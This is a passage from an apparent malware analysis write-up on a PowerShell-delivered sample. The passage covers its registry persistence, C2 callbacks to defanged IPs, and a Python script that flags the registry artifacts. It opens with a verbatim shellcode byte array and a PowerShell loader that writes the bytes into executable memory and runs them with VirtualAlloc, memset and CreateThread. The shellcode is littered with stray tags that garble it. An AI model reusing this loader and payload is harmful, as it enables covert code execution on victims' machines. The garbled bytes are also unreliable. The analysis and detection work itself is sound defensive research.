,0xFF,0xFF,<#npu#>0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC
0,0x41,0x50,0x8B,<#epp#>0x85,<#rc#>0x70,0xFF,0xFF,0xFF,<#poi#>0x50,<#tg#>0xFF,0x55,0xAC,<#stt#>0x85,0xC0,<#kw#>0x75,0x02,0xB3,0x01,0x84,0xDB,<#sax#>0x75,0x05,<#omp#>0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,<#txd#>0xDC,0x00,0x00,0x00,0x50,0x8B,0x85,<#arg#>0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,0x00,0xFA,0xFF,0xFF,0x50,<#cpp#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,0x46,0x83,0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,<#axj#>0x03,0x19,<#vqm#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,<#wrv#>0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,0x00,0x00,0x00,0x8A,0x01,<#onn#>0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,<#zq#>0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,<#zjb#>0x33,0xDB,0x33,0xFF,<#xgp#>0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,<#dn#>0x85,<#oo#>0x60,0xFF,0xFF,0xFF,0x50,0x6A,<#bzq#>0x00,0xFF,<#ato#>0x55,<#tu#>0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,0xBD,0x5C,0xFF,<#kk#>0xFF,0xFF,0x00,0x74,0x29,0x8B,0x85,<#ynp#>0x5C,0xFF,0xFF,0xFF,0x89,0x85,<#ttp#>0x4C,0xFF,0xFF,0xFF,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#bbk#>0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,<#ddv#>0xFF,0xFF,0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,<#upn#>0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,<#xrf#>0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,0x9D,0x00,<#crf#>0xFB,0xFF,0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,0xFF,0x00,0x00,0x00,<#oa#>0x3
2,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,0x04,0x32,0x46,<#suu#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,<#tx#>0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,<#yn#>0xD4,0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,<#vy#>0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,0x6A,0x40,<#lv#>0x68,0x00,0x30,0x00,0x00,<#dlf#>0x53,<#fru#>0x6A,<#ar#>0x00,0xFF,0x55,0xA8,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x54,0x50,0x8B,<#sp#>0x85,<#ltb#>0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,<#lfl#>0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE0,0x00,0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,0x8B,0x85,0x4C,0xFF,0xFF,<#rpo#>0xFF,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,<#imm#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x8B,<#wfm#>0x95,0x7C,0xFF,0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,<#pj#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,0x7C,0x5F,0x40,0x89,<#not#>0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,<#qv#>0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,<#yxg#>0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,0x8D,<#xe#>0x0C,0x89,0x03,<#vzm#>0xD1,0x89,0x95,0x50,0xFF,0xFF,<#hki#>0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,<#gk#>0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,<#zci#>0xFF,0xFF,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,<#ri#>0x34,<#ssf#>0x3B,0x45,0xF8,0x0F,0x84,<#vm#>0xC
B,0x00,<#ns#>0x00,0x00,0x8B,<#qvm#>0x45,0xD0,0x8B,0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,<#of#>0x00,0x00,<#yk#>0x00,0x00,0x0F,0x86,0x87,0x00,0x00,<#va#>0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,<#mx#>0x00,0x00,0x00,0x03,0x45,0xF0,0x89,<#lku#>0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,<#itp#>0xE4,<#vf#>0x8B,0x45,0xEC,0x8B,0x40,0x04,0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,<#qv#>0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,0x75,0x10,0x8B,0x45,0xE8,0x03,0xC1,0x89,0x45,0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,0x3C,0xFF,0xFF,<#sw#>0xFF,<#vj#>0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,<#it#>0xEC,0x89,<#ikx#>0x45,<#irx#>0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,<#yia#>0x45,<#ngg#>0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,<#lw#>0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,<#eeu#>0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#ebt#>0x86,0x9E,0x00,<#cf#>0x00,<#iuu#>0x00,0x8B,0x45,<#iu#>0xD0,0x8B,0x80,0x80,<#sg#>0x00,0x00,<#tav#>0x00,0x03,0x45,0xF8,0x89,0x45,0x8C,0xEB,0x7F,0x03,<#kae#>0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x74,0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,<#da#>0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x88,0x8B,0x45,0x8C,0x8B,<#lo#>0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,<#ut#>0x8B,0x30,<#eyt#>0xF7,0xC6,0x00,0x00,0x00,0x80,0x74,0x12,0x81,0xE6,<#ruo#>0xFF,0xFF,0x00,0x00,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,<#sg#>0xEB,0x10,0x03,0x75,0xF8,0x83,0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,<#ni#>0x83,0x45,0x88,<
#eb#>0x04,0x83,<#fpa#>0x45,<#za#>0x84,0x04,0x8B,0x45,0x88,0x83,<#ezq#>0x38,0x00,0x75,0xC1,0x83,0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,<#fyw#>0x8B,0x40,0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,0xF8,0xFF,0x55,0xF4,<#vag#>0x6A,0x00,<#hoz#>0xFF,0x55,0xA4,<#mri#>0x5F,0x5E,<#qb#>0x5B,0x8B,0xE5,0x5D,0xC2,0x04,<#sh#>0x00,0x8D,0x40,<#mpx#>0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,<#ytl#>0x37,<#zkf#>0x47,0x57,0x73,0x61,0x41,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#gca#>0x00,0x00,0x00,<#rz#>0x00,0x00,0x00,<#no#>0x00,0x00,0x00,<#dfd#>0x00,0x00,0x00,0x00,0x47,0x73,0x44,0x79,0x71,0x74,0x55,0x36,0x71,0x6E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x72,<#qfr#>0x82,0x97,0x46,0xE4,0x1B,0xF2,0xAB,0xD9,0x00,0x0A,0x97,0x82,0x25,0x5F,0xE4,0x99,0x5D,0xB6,0x8E,0x73,0x23,0x46,0x7A,0x92,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,<#ju#>0x00,0x6C,0x00,0x6C,0x00,0x3C,0x00,0x3C,<#aws#>0x00,0x3A,0x00,0x3A,0x00,<#bfw#>0x3E,0x00,0x3E,0x00,<#jp#>0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x62,0x00,<#ad#>0x70,0x00,0x73,0x00,0x3A,0x00,0x3A,0x00,0x62,0x00,0x70,0x00,0x73,0x00,0x6E,0x00,0x75,0x00,0x6D,0x00,0x3A,0x00,0x38,0x00,0x36,0x00,0x34,0x00,<#vy#>0x3A,0x00,0x6E,0x00,0x75,<#zkg#>0x00,0x6D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wcm#>0x00,0x00,<#kx#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x19,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,<#ae#>0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,0x75,0x0C,0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,<#bh#>0xD6,0x27,0xD1,0x58,0x00,0xA0,0x66,0x37,0x13,0x99,0x44,0x82,0x36,0x02,0xCF,0x82,0x58,0xCA,0x0B,0x78,0x64,0xB2,0xF7,0x99,0x2D,0x64,0xA7,<#nfv#>0xAB,0x5F,0x0D,0x9B,0xFB,0x45,0xC2,0x2B,0xAC,0x33,<#dxg#>0x55,0x13,0x8E,0x
CC,0x66,0x63,0x12,0x97,0xED,0x6A,0xFE,0x7E,0x71,<#ay#>0x5B,0xED,<#fv#>0x2F,0xA4,0xC5,<#ong#>0xC7,0x8E,0x38,0x25,0xC9,0x97,0x04,<#ty#>0x16,0xB4,0x67,0xDD,0xFA,0x42,0x4F,0xBE,<#wp#>0x20,0x01,0x2D;
#ebfvxkffvl
$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
#zfgd
if($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
#phjynzzoqx
for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};
#lvytjj
([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
#pjqtttzp
}sleep(1200);}catch{}exit;
#usrucw
#otlbloab

As with the two dropped files above, I am not sure what the difference is between the two regsvr32.exe processes. The parent process (PID 1740) is the one that keeps reaching out to the C2s, as seen in the image labeled "C2s." This parent process is also responsible for creating and setting other registry keys/values, which look somewhat related to what the "a2.exe" process was doing too (for persistence).

Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\tscz
Type:	REG_SZ
Length:	34
Data:	c2lCgcJpAleIXg==

-----

Path: HKCU\Software\lqoiarkklq\tscz
Type:	REG_SZ
Length:	34
Data:	dD9Hi8VsVasp+w==

-----

Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\rhllonear
Type:	REG_SZ
Length:	66
Data:	dW0V3ZU4UEEp/bQvhCo/2F9ajF1fefY=

Persistence is maintained via an entry in the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key, which produces an error when you try to view it, as seen in the image below.

Using "Autoruns" I am able to see that there is a pointer in the registry, and that it points to the path "C:\Users\Administrator\AppData\Local\1354e279\e7da1628.bat". That file contains the following code:

start "yYPkyKv4BygZ9zHX9iqui6" "%LOCALAPPDATA%\1354e279\c3046d01.e5782001b"

The file called by the batch file (c3046d01.e5782001b, listed under Artifacts above) looks to be an encrypted file of sorts.
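The registry values above and the Run-key chain (Run entry, batch file, oddly named payload) are what a hunt for this family keys on. As an added example, not part of the original analysis, the following Python triages a constructed registry snapshot: it flags REG_SZ values that carry large high-entropy, mostly non-printable blobs under non-Microsoft vendor keys, short base64-looking values under the same keys, and Run entries that launch a script from a hex-named %LOCALAPPDATA% directory whose batch file in turn starts a file with a non-standard extension. The key paths, the batch file and the two short base64 values are the ones quoted above; the large blobs, the benign comparison entries and the OneDrive Run entry are constructed here.

```python
import base64
import math
import re


def _opaque_blob(n: int) -> str:
    """Deterministic stand-in for the binary REG_SZ data quoted above (not the real data)."""
    return bytes((i * 131 + 17) & 0xFF for i in range(n)).decode("latin-1")


# Constructed snapshot in the shape of the dumps above: (path, type, data).
REGISTRY_VALUES = [
    (r"HKCU\Software\7GWsaAe\GsDyqtU6qn", "REG_SZ", _opaque_blob(892_566)),
    (r"HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\lapxjqc", "REG_SZ", _opaque_blob(910_252)),
    (r"HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\tscz", "REG_SZ", "c2lCgcJpAleIXg=="),
    (r"HKCU\Software\lqoiarkklq\tscz", "REG_SZ", "dD9Hi8VsVasp+w=="),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "REG_DWORD", "1"),
    (r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir", "REG_SZ",
     r"C:\Program Files (x86)"),
]
# Run-key entries as Autoruns would list them: (value name, command). OneDrive is a benign control.
RUN_KEY_ENTRIES = [
    ("1354e279", r"C:\Users\Administrator\AppData\Local\1354e279\e7da1628.bat"),
    ("OneDrive", r'"C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]
BATCH_FILES = {  # path -> content; this is the batch file quoted above
    r"C:\Users\Administrator\AppData\Local\1354e279\e7da1628.bat":
        'start "yYPkyKv4BygZ9zHX9iqui6" "%LOCALAPPDATA%\\1354e279\\c3046d01.e5782001b"',
}


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_base64(text: str) -> bool:
    if len(text) < 12 or len(text) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", text):
        return False
    try:
        base64.b64decode(text, validate=True)
        return True
    except ValueError:
        return False


def classify_value(path: str, reg_type: str, data: str) -> list:
    """Findings for one registry value; an empty list means nothing stood out."""
    findings = []
    raw = data.encode("latin-1", "replace")
    printable = sum(0x20 <= b < 0x7F for b in raw) / max(len(raw), 1)
    # A REG_SZ carrying ~1 MB of high-entropy, mostly non-printable data is not configuration.
    if reg_type == "REG_SZ" and len(raw) >= 64 * 1024 and shannon_entropy(raw) > 6.0 and printable < 0.8:
        findings.append("large-opaque-blob")
    if looks_base64(data):
        findings.append("base64-value")
    vendor = re.sub(r"^HKLM\\SOFTWARE\\Wow6432Node\\|^HK(?:CU|LM)\\Software\\", "", path,
                    flags=re.I).split("\\")[0]
    if findings and vendor.lower() not in ("microsoft", "classes", "policies"):
        findings.append(f"nonstandard-vendor-key:{vendor}")
    return findings


def classify_run_entry(command: str) -> list:
    """Findings for one Run-key command, following a .bat target into its start line."""
    findings = []
    target = command.strip().strip('"').split('"')[0]
    if re.search(r"\\AppData\\Local\\[0-9a-f]{8}\\", target, re.I):
        findings.append("runs-from-random-localappdata-dir")
    if target.lower().endswith((".bat", ".cmd", ".vbs", ".js", ".ps1")):
        findings.append("script-as-run-target")
    content = BATCH_FILES.get(target)
    if content:
        m = re.search(r'^\s*start\s+"[^"]*"\s+"([^"]+)"', content, re.I | re.M)
        if m:
            final = m.group(1)
            ext = final.rsplit(".", 1)[-1] if "." in final else ""
            if not re.fullmatch(r"[A-Za-z]{2,4}", ext):
                findings.append(f"launches-unusual-extension:{final}")
    return findings


def triage_snapshot() -> dict:
    flagged = {}
    for path, reg_type, data in REGISTRY_VALUES:
        f = classify_value(path, reg_type, data)
        if f:
            flagged[path] = f
    for name, command in RUN_KEY_ENTRIES:
        f = classify_run_entry(command)
        if f:
            flagged["Run\\" + name] = f
    return flagged


if __name__ == "__main__":
    for path, findings in triage_snapshot().items():
        print(path, "->", ", ".join(findings))
```

On a live host the same functions would be fed from a registry export or from `reg query` output; the 64 KB and entropy thresholds are starting points chosen so that ordinary vendor settings stay below them, and the vendor-key check is only applied once another finding is present so that unfamiliar but harmless keys are not flagged on their name alone.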

From the network side, the malware seems to be pretty straightforward. Once the files have been downloaded by the PowerShell script and executed, we can see the POST callbacks to a couple of different IP addresses.

POST /checkupdate HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://194[.]31[.]59[.]5/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 194[.]31[.]59[.]5
Content-Length: 1103
Connection: Keep-Alive

ZZd=%CFi%0FG%D7j%A0%3A%B4%A8%0Bd%B8%B3nU%DE%8F%A3%BF%A9q%CF%84%3C%23%E4%21&uunC=%07AT%95w%25%CE%5C%A9%186%CD%C0%9E%5D%1E%8Es%B2%98%DDS%96%BDx%1F%0E%1E%C3%DF%3CI%DA%E6%9E%E5%01%CA%3E%1D%E9I%E07%2CN%90%83&rhjQSF=.%D60%D1%9At%9FC%E1%1FA%14%5D%ED%B0&IwVFWpRk=%FF9v%C5%D0%067%AB%A4kN%AD%F4%FA%18i&nFzv=1%90%0Ap%3Fw%14%85-%FB%BDg%95-%02%22&yndZOvyk=s%D4%FBK%9F%26%26%7Es%FA%89%0F%29G%AF%BD%1Fe%1F%F0%DBB%3F%C962%A9%D1%80e%7C&lWdL=%89%DE%1BG%07%EA%B8%F6Q%21%DEH%7D%9F%D6L%92%C1%A1%0AC%B1%23%7C%8B%83%BA%AD%EF%8C%D8%BA%19%0B%CBYyT%89%80&lIRiyP=%80%AD%90%CCI%E6%9CP%F5i%04Z%C1Lb%01y%C9%C0%3F2%25%D8D%E9%E2%86%2C%AAsg%EDI%CA%84T78%9F%AB%1B%A3%C4%EF%CD%21&IzGlUb=%A6Q%28%C7%5B9F%03%90%0E%C6%1C%E2%F1%F1%1Cr1M%7B%FF%13%8F%92%D5%3E%3CL%D8Y%BB%BF3%5D%7F%BD%ED%EDp%B3d%8C&dPz=%A4x%91o%D50%7D%26%99%01%F3%8En%B4%BB%90r%18%F1%93%16%BA%E7%FB%E2%97%95%8C%B8%1A%3E2+%DCS%E0%9B&tUNM=%BAYi%93%8D%C3%40%CA%7Cx%EEJa%D3U%95%2Fu%AD&LZNBvnt=%83f%27%29%0Ag%5D%1Dg%A5%DC%2C%C1%0C%3B%01%09%AC%D8%7F%3F%3C%B88f%E3%11%C0%60%CE%8D%9F0%95Pk%91&bNZLk=%8F%A8_%C6%D5%10%C2%91%E3%EA%9B%5EsH%C6CT%A7%00%7F&dItZlk=%B6%F7%8E%14%83%A9%83%B0%ABgM

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Feb 2017 08:50:30 GMT
Content-Type: application/octet-stream
Content-Length: 373
Connection: keep-alive

Q"..<m..Xr5..g.MR.;...!....]...lu..B7.u.K.C....l&......zPl.Ve.....+.G......._....<...;E..${E.{Q	.. .....0.zc...r.....P
.vy.j.qJ.L......@{,..A.'........Pj.f}3.=:......'	8........2.k..E.".m`..5r....	..x.D..6F......D..I..W.....l.{.	.2w^.C4X.P.;.PP^V7.y.N.....Z......T..]m....8...#..,.ho..)..$...	...y...3RH|#R..	@t......d.....Hr.]....H.th$..c.Yt.x^.$7}.?.Dg.-....tykf.......&

-----

POST /checkupdate HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://194[.]31[.]59[.]5/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 194[.]31[.]59[.]5
Content-Length: 690
Connection: Keep-Alive

SIyTD=%3E%E9%90%D6%BAh-%93%60C%D5%FC%DA%7C%B9%00&SjAVD=%BE%21%D9s%B6%D8%13U%5C%B3%CC%B8S%F9%F9FXO%8E%076%C7&FqiGQdBN=%2F%88B%A4%D9lo%BA%D6%06%1ER%CC%16H%E0%2F%E3%A2%BE%91%2F%BB%3C%D8%AA%05%91%B3xy%F9%B1&cXlYLNr=%7C%CE%C0%C9%5E%C4%DByY%BC%B2%2B%9C%BC%8B%BA%E9V%D7%D7%7E%5B%F8g%063%3C%F6F%1B%40C9%F0%5CI&KXLjATwr=%18y%E0%1F4%A3%2A%DB%06%14%7C%B6t%AF%15g%F5%C2D%F5%F1%BAC%DE%0F%80B%CF%D8%FB%8F%1C%C4%92%19%D0&sEREwsM=%86C%E2%B6%95%F9%CEK%0B%1F%1FT%97%3D%FBb%5C%8B%27Vq%99%94%D03j%81%E1B%8F%1F2%0A%A3%D0SB%BD&TEZc=P%7E%D5%0F%D3%92%B3%17%96%0A%A9%00%94%AB%86%DFp%9B%D8%13%98%C6E%8A%0Eq%05%1E%BFw%E1%0A%D6%A9%D6%B3%F5&ahXmRSFz=%5E%C1mAf%1A%29%99%B6%E9%8C%D9%AA%0D%DB%1E%8A%5Dtg%B8%D37OS%C2%83%F7L

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Feb 2017 08:50:31 GMT
Content-Type: application/octet-stream
Content-Length: 1074
Connection: keep-alive

[binary (encrypted) response body omitted]

-----

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 128[.]1[.]191[.]207
Content-Length: 472
Cache-Control: no-cache

[base64-encoded POST body omitted]

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 03 Feb 2017 08:50:55 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

-----

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 104[.]247[.]149[.]240
Content-Length: 452
Cache-Control: no-cache

[base64-encoded POST body omitted]

HTTP/1.1 301 Moved Permanently
Server: nginx/1.10.2
Date: Fri, 03 Feb 2017 08:50:58 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://devel[.]highproxies[.]com/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.10.2</center>
</body>
</html>

It is here that we see a callback over HTTPS using a Let's Encrypt SSL certificate:

[TLS handshake bytes omitted; the readable fields from the Client Hello and the server certificate are:]
SNI: devel.highproxies.com
Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
Validity: 161230090800Z to 170330090800Z (2016-12-30 to 2017-03-30)
Subject: CN=devel[.]highproxies[.]com (SAN: devel.highproxies.com)
OCSP: http://ocsp.int-x3.letsencrypt.org/
CA Issuers: http://cert.int-x3.letsencrypt.org/
CPS: http://cps.letsencrypt.org (policy text: "This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at http://letsencrypt.org/repository/")

We can also see in Wireshark’s Conversations pane (see below) that there are attempts to talk to several IP addresses over port 8080. These failed: only one packet was sent to each and none of them got a response.

While Process Explorer was running as I looked through the Process Monitor logs and other things, I kept seeing the “regsvr.exe” process (PID 1740) constantly connecting to different IP addresses and ports. Since the Wireshark capture had already finished, I fired up another one and let it capture some of that traffic. This time around I got different IP addresses (except for the one using HTTPS), and also different IP addresses being tried on port 8080 (see the image below).

